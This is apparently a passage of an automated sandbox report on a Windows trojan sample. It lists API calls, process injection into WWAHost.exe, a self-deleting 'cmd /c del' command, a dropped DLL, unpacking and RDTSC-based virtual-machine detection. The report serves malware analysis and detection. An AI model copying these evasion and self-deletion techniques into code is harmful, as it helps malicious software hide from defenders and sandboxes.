          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889610 NtEnumerateValueKey,7_2_03889610
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A10 NtQuerySection,7_2_03889A10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A20 NtResumeThread,7_2_03889A20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889670 NtQueryInformationProcess,7_2_03889670
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038899D0 NtCreateProcessEx,7_2_038899D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038895F0 NtQueryInformationFile,7_2_038895F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889520 NtWaitForSingleObject,7_2_03889520
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388AD30 NtSetContextThread,7_2_0388AD30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889950 NtQueueApcThread,7_2_03889950
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889560 NtWriteFile,7_2_03889560
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038898A0 NtWriteVirtualMemory,7_2_038898A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038898F0 NtReadVirtualMemory,7_2_038898F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889820 NtEnumerateKey,7_2_03889820
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388B040 NtSuspendThread,7_2_0388B040
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005785D0 NtCreateFile,7_2_005785D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00578680 NtReadFile,7_2_00578680
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00578700 NtClose,7_2_00578700
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005787B0 NtAllocateVirtualMemory,7_2_005787B0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005785CA NtCreateFile,7_2_005785CA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00578622 NtCreateFile,7_2_00578622
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005786FA NtClose,7_2_005786FA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005787AA NtAllocateVirtualMemory,7_2_005787AA
          Source: DN_467842234567.exe, 00000000.00000003.671874971.000000000EA76000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DN_467842234567.exe
          Source: DN_467842234567.exe, 00000001.00000002.734746634.0000000000B16000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs DN_467842234567.exe
          Source: DN_467842234567.exe, 00000001.00000002.735470838.0000000000C7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DN_467842234567.exe
          Source: DN_467842234567.exeReversingLabs: Detection: 64%
          Source: C:\Users\user\Desktop\DN_467842234567.exeFile read: C:\Users\user\Desktop\DN_467842234567.exeJump to behavior
          Source: DN_467842234567.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DN_467842234567.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe'Jump to behavior
          Source: C:\Users\user\Desktop\DN_467842234567.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\DN_467842234567.exeFile created: C:\Users\user\AppData\Local\Temp\nslF1B.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@13/6
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
          Source: C:\Users\user\Desktop\DN_467842234567.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042C1
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: WWAHost.pdb source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DN_467842234567.exe, 00000000.00000003.669973012.000000000EAF0000.00000004.00000001.sdmp, DN_467842234567.exe, 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, WWAHost.exe, 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DN_467842234567.exe, WWAHost.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeUnpacked PE file: 1.2.DN_467842234567.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0040C845 push es; ret 1_2_0040C846
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B87C push eax; ret 1_2_0041B882
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B812 push eax; ret 1_2_0041B818
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B81B push eax; ret 1_2_0041B882
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004172E9 push edx; retf 1_2_004172EE
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00418AE8 push ds; retf 1_2_00418AED
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B7C5 push eax; ret 1_2_0041B818
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BDD0D1 push ecx; ret 1_2_00BDD0E4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0389D0D1 push ecx; ret 7_2_0389D0E4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0056C845 push es; ret 7_2_0056C846
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B87C push eax; ret 7_2_0057B882
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B812 push eax; ret 7_2_0057B818
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B81B push eax; ret 7_2_0057B882
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005772E9 push edx; retf 7_2_005772EE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00578AE8 push ds; retf 7_2_00578AED
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B7C5 push eax; ret 7_2_0057B818
          Source: initial sampleStatic PE information: section name: .data entropy: 7.77743167322
          Source: C:\Users\user\Desktop\DN_467842234567.exeFile created: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del 'C:\Users\user\Desktop\DN_467842234567.exe'Jump to behavior
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DN_467842234567.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 00000000005685F4 second address: 00000000005685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 000000000056898E second address: 0000000000568994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 5152Thread sleep time: -55000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 7076Thread sleep time: -46000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: explorer.exe, 00000004.00000000.718727163.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.715398988.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.718727163.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000004.00000000.692764145.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.700657795.000000000A897000.00000004.00000001.sdmpBinary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}WW
          Source: explorer.exe, 00000004.00000000.700657795.000000000A897000.00000004.00000001.sdmpBinary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_729156EA mov eax, dword ptr fs:[00000030h]0_2_729156EA
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_729159AF mov eax, dword ptr fs:[00000030h]0_2_729159AF
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_729158FE mov eax, dword ptr fs:[00000030h]0_2_729158FE
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_729159EE mov eax, dword ptr fs:[00000030h]0_2_729159EE
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_72915A2C mov eax, dword ptr fs:[00000030h]0_2_72915A2C
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBF0BF mov ecx, dword ptr fs:[00000030h]1_2_00BBF0BF
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBF0BF mov eax, dword ptr fs:[00000030h]1_2_00BBF0BF
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBF0BF mov eax, dword ptr fs:[00000030h]1_2_00BBF0BF
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00C1B8D0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00C1B8D0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00C1B8D0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00C1B8D0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00C1B8D0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00C1B8D0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC90AF mov eax, dword ptr fs:[00000030h]1_2_00BC90AF
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]1_2_00BB20A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]1_2_00BB20A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]1_2_00BB20A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]1_2_00BB20A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]1_2_00BB20A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]1_2_00BB20A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89080 mov eax, dword ptr fs:[00000030h]1_2_00B89080
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C03884 mov eax, dword ptr fs:[00000030h]1_2_00C03884
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C03884 mov eax, dword ptr fs:[00000030h]1_2_00C03884
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B858EC mov eax, dword ptr fs:[00000030h]1_2_00B858EC
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h]1_2_00B9B02A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h]1_2_00B9B02A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h]1_2_00B9B02A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h]1_2_00B9B02A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]1_2_00BB002D
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]1_2_00BB002D
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]1_2_00BB002D
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]1_2_00BB002D
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]1_2_00BB002D
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C51074 mov eax, dword ptr fs:[00000030h]1_2_00C51074
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C42073 mov eax, dword ptr fs:[00000030h]1_2_00C42073
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C54015 mov eax, dword ptr fs:[00000030h]1_2_00C54015
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C54015 mov eax, dword ptr fs:[00000030h]1_2_00C54015
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h]1_2_00C07016
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h]1_2_00C07016
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h]1_2_00C07016
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA0050 mov eax, dword ptr fs:[00000030h]1_2_00BA0050
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA0050 mov eax, dword ptr fs:[00000030h]1_2_00BA0050
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB61A0 mov eax, dword ptr fs:[00000030h]1_2_00BB61A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB61A0 mov eax, dword ptr fs:[00000030h]1_2_00BB61A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C141E8 mov eax, dword ptr fs:[00000030h]1_2_00C141E8
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2990 mov eax, dword ptr fs:[00000030h]1_2_00BB2990
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BAC182 mov eax, dword ptr fs:[00000030h]1_2_00BAC182
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBA185 mov eax, dword ptr fs:[00000030h]1_2_00BBA185
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00B8B1E1
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00B8B1E1
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00B8B1E1
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C069A6 mov eax, dword ptr fs:[00000030h]1_2_00C069A6
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h]1_2_00C051BE
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h]1_2_00C051BE
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h]1_2_00C051BE
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h]1_2_00C051BE
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB513A mov eax, dword ptr fs:[00000030h]1_2_00BB513A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB513A mov eax, dword ptr fs:[00000030h]1_2_00BB513A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h]1_2_00BA4120
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h]1_2_00BA4120
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h]1_2_00BA4120
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h]1_2_00BA4120
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA4120 mov ecx, dword ptr fs:[00000030h]1_2_00BA4120
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h]1_2_00B89100
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h]1_2_00B89100
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h]1_2_00B89100
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8B171 mov eax, dword ptr fs:[00000030h]1_2_00B8B171
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8B171 mov eax, dword ptr fs:[00000030h]1_2_00B8B171
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8C962 mov eax, dword ptr fs:[00000030h]1_2_00B8C962
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BAB944 mov eax, dword ptr fs:[00000030h]1_2_00BAB944
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BAB944 mov eax, dword ptr fs:[00000030h]1_2_00BAB944
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]1_2_00B9AAB0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]1_2_00B9AAB0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBFAB0 mov eax, dword ptr fs:[00000030h]1_2_00BBFAB0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]1_2_00B852A5
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]1_2_00B852A5
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]1_2_00B852A5
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]1_2_00B852A5
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]1_2_00B852A5
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBD294 mov eax, dword ptr fs:[00000030h]1_2_00BBD294
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBD294 mov eax, dword ptr fs:[00000030h]1_2_00BBD294
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2AE4 mov eax, dword ptr fs:[00000030h]1_2_00BB2AE4
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2ACB mov eax, dword ptr fs:[00000030h]1_2_00BB2ACB
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC4A2C mov eax, dword ptr fs:[00000030h]1_2_00BC4A2C
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC4A2C mov eax, dword ptr fs:[00000030h]1_2_00BC4A2C
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4EA55 mov eax, dword ptr fs:[00000030h]1_2_00C4EA55
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C14257 mov eax, dword ptr fs:[00000030h]1_2_00C14257
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C3B260 mov eax, dword ptr fs:[00000030h]1_2_00C3B260
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C3B260 mov eax, dword ptr fs:[00000030h]1_2_00C3B260
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA3A1C mov eax, dword ptr fs:[00000030h]1_2_00BA3A1C
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C58A62 mov eax, dword ptr fs:[00000030h]1_2_00C58A62
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h]1_2_00B85210
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B85210 mov ecx, dword ptr fs:[00000030h]1_2_00B85210
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h]1_2_00B85210
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h]1_2_00B85210
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h]1_2_00B8AA16
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h]1_2_00B8AA16
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B98A0A mov eax, dword ptr fs:[00000030h]1_2_00B98A0A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC927A mov eax, dword ptr fs:[00000030h]1_2_00BC927A
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4AA16 mov eax, dword ptr fs:[00000030h]1_2_00C4AA16
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4AA16 mov eax, dword ptr fs:[00000030h]1_2_00C4AA16
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h]1_2_00B89240
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h]1_2_00B89240
